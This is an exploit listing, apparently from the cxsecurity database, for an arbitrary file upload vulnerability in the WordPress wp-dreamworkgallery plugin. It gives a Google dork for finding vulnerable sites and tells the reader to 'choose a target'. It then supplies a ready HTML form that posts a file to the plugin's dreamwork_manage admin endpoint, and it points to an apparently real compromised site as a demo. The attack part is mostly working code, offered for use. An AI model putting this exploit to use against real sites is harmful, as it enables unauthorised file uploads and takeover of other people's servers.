Wordpress dreamwork_manage File Upload Vulnerability

Published
Credit
Risk
2017.04.05
Anonymous Palestine
Medium
CWE
CVE
Local
Remote
N/A
N/A
No
Yes
Dork: inurl:/wp-content/plugins/wp-dreamworkgallery

##################################################JokerSecurity################################ # Title : Wordpress File Upload Vulnerability
# Dork : inurl:/wp-content/plugins/wp-dreamworkgallery
# Tested on: [ Kali-Linux]
# MyChannel Youtube : https://www.youtube.com/c/Professionalhacker25
# Myblog : http://kader-information.blogspot.com/
# Link video : https://www.youtube.com/watch?v=h1xWghkVPEw
# Date: 2/04/2017
######################
# [+] DESCRIPTION :
######################
# 1: Search Google Dork and Choose a Target
###########
Code exploit :
###########
<html>
<body>
<form action="http://www.site.com/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" /> <input type="hidden" name="album_name" value="Arbitrary File Upload" /> <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> <input type="file" name="album_img" value="" /> <input type="submit" value="Submit" /> </form>
</body>
</html>
######
# 3 Upload Your File ==== File.html ######
Demo : ###### http://www.theatredumordant.fr/wp-content/plugins/wp-dreamworkgallery/xml/drm_all.xml ######################
subscribe for my channel and page in facebook
# My Blogger : http://kader-information.blogspot.com/
# Page FacebOOk 1 : https://www.facebook.com/AnonymousPalestine.vip
# Page Facebook 2 : http://facebook.com/kali.linux.pentesting.tutorials
# Page FacebOOK 3 : https://www.facebook.com/Professional.hacker.25
By <3 ##################################################JokerSecurity###############################

References:

https://www.facebook.com/AnonymousPalestine.vip/
https://www.youtube.com/watch?v=h1xWghkVPEw


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com